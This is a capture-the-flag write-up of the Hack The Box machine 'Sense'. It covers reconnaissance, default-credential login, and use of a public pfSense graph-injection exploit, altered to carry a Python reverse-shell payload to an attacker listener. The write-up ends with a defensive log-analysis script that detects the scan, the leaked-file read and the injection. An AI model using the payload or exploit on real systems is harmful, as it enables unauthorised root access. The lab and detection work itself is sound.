Welcome to the Sense writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Sense
Tags: HTB, Easy, FreeBSD, OSCP
Platform: Hackthebox
Difficulty: Easy
OS: FreeBSD
Enumeration
Nmap
To get started, we run a quick scan for open ports.
# nmap -p- -T4 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:17 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 91.70 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,443 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:19 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http lighttpd 1.4.35
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.35
|_http-title: 501
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Comau embedded (92%)
Aggressive OS guesses: Comau C4G robot control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 93.34 ms 10.10.14.1
2 93.34 ms sense.htb (10.10.10.60)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds
Accessing the webserver, we find a pfSense installation running.
Gobuster
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60/ -x php,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.60/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2021/03/21 21:04:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2021/03/21 22:50:55 Finished
===============================================================
Inside system-users.txt we find a username and a hint for the password.
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Testing with the user rohit and the default password pfsense, we managed to access the panel.
Exploitation
Looking around on the internet, I found that the graph module has a vulnerability that lets us perform code injection. I also found this page, where a Python exploit is available.
In the exploit, you originally have to modify lines 27 to 31:
username = "admin"
password = "pfsense"
listener_ip = "10.0.0.1"
listener_port = "4444"
target_ip = "10.0.0.2"
In my case, the nc payload did not work, and the msf payload established a connection that was lost instantly, so I modified the nc payload to execute a reverse shell in Python instead, escaping the quotes properly.
# php/reverse_php
php_reverse_shell = """
exec('python -c \\\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8787));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\\\'');
"""
Now we only have to start a listener in a terminal and run the exploit!
# python3 pfSenseRCI.py nc
[*] setting payload to nc reverse shell (catch with 'nc -lvp PORT')
[*] exploiting pfsense_graph_injection_exec
[*] generating obfuscated/encoded reverse shell payload for 10.10.14.5:8787
[+] generated obfuscated/encoded payload
[+] authenticating to firewall with (rohit:pfsense)
[+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[+] authentication successful!
[+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[*] octal encoding payload
[+] encoding complete
[*] injecting into https://10.10.10.60/status_rrd_graph_img.php
[+] exploit code injected successfully
[*] triggering the exploit (make sure to catch on 10.10.14.5:8787)
And enjoy being root!!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 23408
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /home/rohit/user.txt
CENSORED_FLAG
# cat /root/root.txt
CENSORED_FLAG
#
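From the defender's side, the three things this box's webserver saw are all visible in its access log: the wordlist scan, the read of the leaked system-users.txt, and a request to status_rrd_graph_img.php carrying shell metacharacters or octal escapes in its query string. The following script is an added example, not part of the original writeup or the exploit; the lighttpd-style log lines, client IPs and the 404 threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed lighttpd access-log lines (sample data, not captured from the box),
# mirroring what this writeup shows the server receiving: a wordlist scan, the read
# of the leaked system-users.txt, and a status_rrd_graph_img.php request whose
# query carries a shell metacharacter and octal escapes, next to a legitimate one.
SAMPLE_LOG = r"""
10.10.14.5 sense.htb - [21/Mar/2021:21:04:18 +0100] "GET /wizard.php HTTP/1.1" 200 512 "-" "gobuster/3.0.1"
10.10.14.5 sense.htb - [21/Mar/2021:21:04:18 +0100] "GET /notthere.php HTTP/1.1" 404 0 "-" "gobuster/3.0.1"
10.10.14.5 sense.htb - [21/Mar/2021:21:04:19 +0100] "GET /notthere.txt HTTP/1.1" 404 0 "-" "gobuster/3.0.1"
10.10.14.5 sense.htb - [21/Mar/2021:22:50:55 +0100] "GET /system-users.txt HTTP/1.1" 200 95 "-" "gobuster/3.0.1"
10.10.10.7 sense.htb - [22/Mar/2021:08:00:00 +0100] "GET /status_rrd_graph_img.php?database=wan-quality.rrd&graph=wan HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.5 sense.htb - [22/Mar/2021:20:32:11 +0100] "GET /status_rrd_graph_img.php?database=queues.rrd%3Bprintf+%27%5C141%5C142%27 HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
""".strip()

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Shell metacharacters or an octal escape such as \141: none belong in a graph request.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|\\[0-7]{3}")

def parse(line):
    """Return ip, path, URL-decoded query and status for one line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "path": path, "query": unquote(query), "status": int(m.group("status"))}

def analyse(log_text, not_found_threshold=2):
    """Return (rule, ip, detail) alerts for the three behaviours this writeup shows."""
    alerts, not_found = [], Counter()
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        if rec["status"] == 404:  # wordlist scans leave a trail of these per source IP
            not_found[rec["ip"]] += 1
        if rec["path"] == "/system-users.txt" and rec["status"] == 200:
            alerts.append(("sensitive-file-read", rec["ip"], rec["path"]))
        if rec["path"] == "/status_rrd_graph_img.php" and SHELL_META_RE.search(rec["query"]):
            alerts.append(("rrd-graph-injection", rec["ip"], rec["query"]))
    for ip, n in not_found.items():
        if n >= not_found_threshold:  # threshold is an assumption; tune it per site
            alerts.append(("directory-bruteforce", ip, f"{n} responses with status 404"))
    return alerts

if __name__ == "__main__":
    for rule, ip, detail in analyse(SAMPLE_LOG):
        print(f"{rule:22} {ip:12} {detail}")
```

The legitimate graph request from 10.10.10.7 raises nothing, while the scanning host trips all three rules.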